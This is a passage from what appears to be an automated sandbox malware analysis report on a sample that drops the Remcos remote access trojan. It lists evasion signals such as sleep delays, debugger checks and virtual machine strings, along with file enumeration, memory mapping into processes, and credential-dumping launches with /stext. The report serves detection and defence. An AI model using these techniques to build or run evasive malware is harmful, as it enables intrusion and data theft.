                      Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Cmzcxhwn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Cmzcxhwn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Cmzcxhwn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Cmzcxhwn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Cmzcxhwn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Cmzcxhwn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Cmzcxhwn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Cmzcxhwn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Cmzcxhwn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Cmzcxhwn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Cmzcxhwn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Cmzcxhwn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Cmzcxhwn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Cmzcxhwn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Cmzcxhwn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Cmzcxhwn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Cmzcxhwn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Cmzcxhwn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Cmzcxhwn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Cmzcxhwn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Cmzcxhwn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Cmzcxhwn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Cmzcxhwn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Cmzcxhwn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Cmzcxhwn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Cmzcxhwn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Cmzcxhwn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Cmzcxhwn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Cmzcxhwn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Cmzcxhwn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Cmzcxhwn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Cmzcxhwn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Cmzcxhwn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Cmzcxhwn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Cmzcxhwn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Cmzcxhwn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Cmzcxhwn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Cmzcxhwn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Cmzcxhwn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Cmzcxhwn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX

                      Malware Analysis System Evasion

                      barindex
                      Delayed program exit found
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeCode function: 0_2_1568F7A7 Sleep,ExitProcess,0_2_1568F7A7
                      Source: C:\Users\Public\Libraries\Cmzcxhwn.PIFCode function: 8_2_14A9F7A7 Sleep,ExitProcess,8_2_14A9F7A7
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeCode function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,0_2_1569A748
                      Source: C:\Users\Public\Libraries\Cmzcxhwn.PIFCode function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,8_2_14AAA748
                      Source: C:\ProgramData\Remcos\remcos.exeWindow / User API: threadDelayed 2047Jump to behavior
                      Source: C:\ProgramData\Remcos\remcos.exeWindow / User API: threadDelayed 7621Jump to behavior
                      Source: C:\ProgramData\Remcos\remcos.exeWindow / User API: foregroundWindowGot 1742Jump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeDropped PE file which has not been started: C:\Users\Public\Libraries\easinvoker.exeJump to dropped file
                      Source: C:\Users\Public\Libraries\Cmzcxhwn.PIFEvasive API call chain: RegQueryValue,DecisionNodes,Sleep
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeAPI coverage: 8.9 %
                      Source: C:\Users\Public\Libraries\Cmzcxhwn.PIFAPI coverage: 1.7 %
                      Source: C:\ProgramData\Remcos\remcos.exe TID: 1736Thread sleep time: -62000s >= -30000sJump to behavior
                      Source: C:\ProgramData\Remcos\remcos.exe TID: 3232Thread sleep time: -6141000s >= -30000sJump to behavior
                      Source: C:\ProgramData\Remcos\remcos.exe TID: 3232Thread sleep time: -22863000s >= -30000sJump to behavior
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeCode function: 0_2_15689665 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,0_2_15689665
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeCode function: 0_2_1568C34D FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,0_2_1568C34D
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeCode function: 0_2_15689253 __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,0_2_15689253
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeCode function: 0_2_1569C291 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,0_2_1569C291
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeCode function: 0_2_1568BD37 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,0_2_1568BD37
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeCode function: 0_2_156CE879 FindFirstFileExA,0_2_156CE879
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeCode function: 0_2_1568783C FindFirstFileW,FindNextFileW,0_2_1568783C
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeCode function: 0_2_1568880C __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,0_2_1568880C
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeCode function: 0_2_1568BB30 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,0_2_1568BB30
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeCode function: 0_2_15699AF5 FindFirstFileW,FindNextFileW,FindNextFileW,0_2_15699AF5
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeCode function: 0_2_02DE58CC GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,0_2_02DE58CC
                      Source: C:\ProgramData\Remcos\remcos.exeCode function: 6_2_33A510F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,6_2_33A510F1
                      Source: C:\ProgramData\Remcos\remcos.exeCode function: 6_2_33A56580 FindFirstFileExA,6_2_33A56580
                      Source: C:\Users\Public\Libraries\Cmzcxhwn.PIFCode function: 8_2_14ADE879 FindFirstFileExA,8_2_14ADE879
                      Source: C:\Users\Public\Libraries\Cmzcxhwn.PIFCode function: 8_2_14A99665 FindFirstFileW,FindNextFileW,FindClose,FindClose,8_2_14A99665
                      Source: C:\Users\Public\Libraries\Cmzcxhwn.PIFCode function: 8_2_14A9783C FindFirstFileW,FindNextFileW,8_2_14A9783C
                      Source: C:\Users\Public\Libraries\Cmzcxhwn.PIFCode function: 8_2_14A9880C FindFirstFileW,FindNextFileW,FindClose,8_2_14A9880C
                      Source: C:\Users\Public\Libraries\Cmzcxhwn.PIFCode function: 8_2_14AAC291 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,8_2_14AAC291
                      Source: C:\Users\Public\Libraries\Cmzcxhwn.PIFCode function: 8_2_14AA9AF5 FindFirstFileW,8_2_14AA9AF5
                      Source: C:\Users\Public\Libraries\Cmzcxhwn.PIFCode function: 8_2_14A9BB30 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,8_2_14A9BB30
                      Source: C:\Users\Public\Libraries\Cmzcxhwn.PIFCode function: 8_2_14A9C34D FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,8_2_14A9C34D
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeCode function: 0_2_15687C97 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,0_2_15687C97
                      Source: remcos.exe, 00000013.00000003.1914864143.00000000007D2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWX
                      Source: remcos.exe, 00000011.00000002.1739100863.0000000000958000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW.
                      Source: remcos.exe, 00000013.00000003.1914864143.00000000007E7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWUo
                      Source: remcos.exe, 00000011.00000002.1739100863.0000000000926000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW(=
                      Source: fu56fbrtn8.exe, 00000000.00000002.1421024098.00000000007C0000.00000004.00000020.00020000.00000000.sdmp, fu56fbrtn8.exe, 00000000.00000002.1421024098.000000000080D000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 00000006.00000002.3813258575.00000000006F1000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 00000006.00000002.3813258575.00000000006DC000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 00000010.00000003.1645700884.0000000000856000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 00000010.00000003.1645700884.0000000000826000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 00000011.00000002.1739100863.0000000000958000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 00000013.00000003.1914864143.00000000007E7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                      Source: fu56fbrtn8.exe, 00000000.00000002.1421024098.000000000080D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW'
                      Source: bhv3CFC.tmp.13.dr, bhv2770.tmp.9.drBinary or memory string: https://r.bing.com/rb/18/jnc,nj/6hU_LneafI_NFLeDvM367ebFaKQ.js?bu=Dx0ma3d6fXRucbIBtQEmpQEmuAE&or=w
                      Source: Cmzcxhwn.PIF, 00000012.00000002.1787599140.00000000005D6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlli
                      Source: Cmzcxhwn.PIF, 00000008.00000002.1531336451.00000000008F0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeAPI call chain: ExitProcess graph end nodegraph_0-84233
                      Source: C:\Users\Public\Libraries\Cmzcxhwn.PIFAPI call chain: ExitProcess graph end node
                      Source: C:\Users\Public\Libraries\Cmzcxhwn.PIFAPI call chain: ExitProcess graph end node
                      Source: C:\ProgramData\Remcos\remcos.exeProcess information queried: ProcessInformationJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeCode function: 0_2_156B49F9 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_156B49F9
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeCode function: 0_2_1569CB50 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,0_2_1569CB50
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeCode function: 0_2_156C32B5 mov eax, dword ptr fs:[00000030h]0_2_156C32B5
                      Source: C:\ProgramData\Remcos\remcos.exeCode function: 6_2_33A54AB4 mov eax, dword ptr fs:[00000030h]6_2_33A54AB4
                      Source: C:\Users\Public\Libraries\Cmzcxhwn.PIFCode function: 8_2_14AD32B5 mov eax, dword ptr fs:[00000030h]8_2_14AD32B5
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeCode function: 0_2_15692077 GetProcessHeap,HeapFree,0_2_15692077
                      Source: C:\ProgramData\Remcos\remcos.exeProcess token adjusted: Debug
                      Source: C:\ProgramData\Remcos\remcos.exeProcess token adjusted: Debug
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeCode function: 0_2_156B4FDC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_156B4FDC
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeCode function: 0_2_156B49F9 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_156B49F9
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeCode function: 0_2_156B4B47 SetUnhandledExceptionFilter,0_2_156B4B47
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeCode function: 0_2_156BBB22 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_156BBB22
                      Source: C:\ProgramData\Remcos\remcos.exeCode function: 6_2_33A52B1C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,6_2_33A52B1C
                      Source: C:\ProgramData\Remcos\remcos.exeCode function: 6_2_33A52639 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_33A52639
                      Source: C:\ProgramData\Remcos\remcos.exeCode function: 6_2_33A560E2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_33A560E2
                      Source: C:\Users\Public\Libraries\Cmzcxhwn.PIFCode function: 8_2_14AC4FDC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,8_2_14AC4FDC
                      Source: C:\Users\Public\Libraries\Cmzcxhwn.PIFCode function: 8_2_14AC49F8 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,8_2_14AC49F8
                      Source: C:\Users\Public\Libraries\Cmzcxhwn.PIFCode function: 8_2_14AC49F9 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,8_2_14AC49F9
                      Source: C:\Users\Public\Libraries\Cmzcxhwn.PIFCode function: 8_2_14ACBB22 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,8_2_14ACBB22
                      Source: C:\Users\Public\Libraries\Cmzcxhwn.PIFCode function: 8_2_14AC4B47 SetUnhandledExceptionFilter,8_2_14AC4B47

                      HIPS / PFW / Operating System Protection Evasion

                      barindex
                      Maps a DLL or memory area into another process
                      Source: C:\ProgramData\Remcos\remcos.exeSection loaded: NULL target: C:\ProgramData\Remcos\remcos.exe protection: execute and read and writeJump to behavior
                      Source: C:\ProgramData\Remcos\remcos.exeSection loaded: NULL target: C:\ProgramData\Remcos\remcos.exe protection: execute and read and writeJump to behavior
                      Source: C:\ProgramData\Remcos\remcos.exeSection loaded: NULL target: C:\ProgramData\Remcos\remcos.exe protection: execute and read and writeJump to behavior
                      Source: C:\ProgramData\Remcos\remcos.exeSection loaded: NULL target: C:\ProgramData\Remcos\remcos.exe protection: execute and read and writeJump to behavior
                      Source: C:\ProgramData\Remcos\remcos.exeSection loaded: NULL target: C:\ProgramData\Remcos\remcos.exe protection: execute and read and writeJump to behavior
                      Source: C:\ProgramData\Remcos\remcos.exeSection loaded: NULL target: C:\ProgramData\Remcos\remcos.exe protection: execute and read and writeJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeCode function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe0_2_156920F7
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeCode function: 0_2_15699627 mouse_event,0_2_15699627
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeProcess created: C:\ProgramData\Remcos\remcos.exe "C:\ProgramData\Remcos\remcos.exe" Jump to behavior
                      Source: C:\ProgramData\Remcos\remcos.exeProcess created: C:\ProgramData\Remcos\remcos.exe C:\ProgramData\Remcos\remcos.exe /stext "C:\Users\user\AppData\Local\Temp\kcrrhbu"Jump to behavior
                      Source: C:\ProgramData\Remcos\remcos.exeProcess created: C:\ProgramData\Remcos\remcos.exe C:\ProgramData\Remcos\remcos.exe /stext "C:\Users\user\AppData\Local\Temp\uxwkztfesgm"Jump to behavior
                      Source: C:\ProgramData\Remcos\remcos.exeProcess created: C:\ProgramData\Remcos\remcos.exe C:\ProgramData\Remcos\remcos.exe /stext "C:\Users\user\AppData\Local\Temp\fzkcamqygoemct"Jump to behavior
                      Source: C:\ProgramData\Remcos\remcos.exeProcess created: C:\ProgramData\Remcos\remcos.exe C:\ProgramData\Remcos\remcos.exe /stext "C:\Users\user\AppData\Local\Temp\cidefd"Jump to behavior
                      Source: C:\ProgramData\Remcos\remcos.exeProcess created: C:\ProgramData\Remcos\remcos.exe C:\ProgramData\Remcos\remcos.exe /stext "C:\Users\user\AppData\Local\Temp\mkqxyvffd"Jump to behavior
                      Source: C:\ProgramData\Remcos\remcos.exeProcess created: C:\ProgramData\Remcos\remcos.exe C:\ProgramData\Remcos\remcos.exe /stext "C:\Users\user\AppData\Local\Temp\wevpzoqgrjkc"Jump to behavior
                      Source: remcos.exe, 00000006.00000003.2204454326.000000000076F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager16\`
                      Source: remcos.exe, 00000006.00000002.3813258575.000000000069E000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 00000006.00000002.3819338341.000000000077C000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 00000006.00000003.2204454326.000000000076F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager
                      Source: remcos.exe, 00000006.00000003.2204454326.000000000076F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager16\28
                      Source: remcos.exe, 00000006.00000003.2204454326.000000000076F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager16\rg:
                      Source: remcos.exe, 00000006.00000002.3813258575.000000000069E000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 00000006.00000003.2204454326.000000000076F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager16\
                      Source: remcos.exe, 00000006.00000003.2204454326.000000000076F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager16\w
                      Source: remcos.exe, 00000006.00000003.2204454326.000000000076F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager16\31
                      Source: remcos.exe, 00000006.00000002.3813258575.000000000069E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager16\s|X
                      Source: remcos.exe, 00000006.00000003.2204454326.000000000076F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager16\*|
                      Source: remcos.exe, 00000006.00000003.2204454326.000000000076F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager16\n
                      Source: remcos.exe, 00000006.00000002.3819338341.000000000077C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managert
                      Source: remcos.exe, 00000006.00000003.2204454326.000000000076F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager16\S
                      Source: remcos.exe, 00000006.00000002.3813258575.000000000073B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managermcos\remcos.exexe
                      Source: remcos.exe, 00000006.00000003.2204454326.000000000076F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager16\i
                      Source: remcos.exe, 00000006.00000002.3819232580.000000000076C000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 00000006.00000003.2204886871.0000000000766000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 00000006.00000002.3813258575.000000000073B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: |Program Manager|
                      Source: remcos.exe, 00000006.00000003.2204454326.000000000076F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager16\*
                      Source: remcos.exe, 00000006.00000003.2204454326.000000000076F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager16\J
                      Source: remcos.exe, 00000006.00000003.2204454326.000000000078E000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 00000006.00000002.3819338341.000000000078E000.00000004.00000020.00020000.00000000.sdmp, logs.dat.6.drBinary or memory string: [Program Manager]
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeCode function: 0_2_156B4C52 cpuid 0_2_156B4C52
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeCode function: GetLocaleInfoW,0_2_156D2543
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,0_2_156D243C
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeCode function: EnumSystemLocalesW,0_2_156C8404
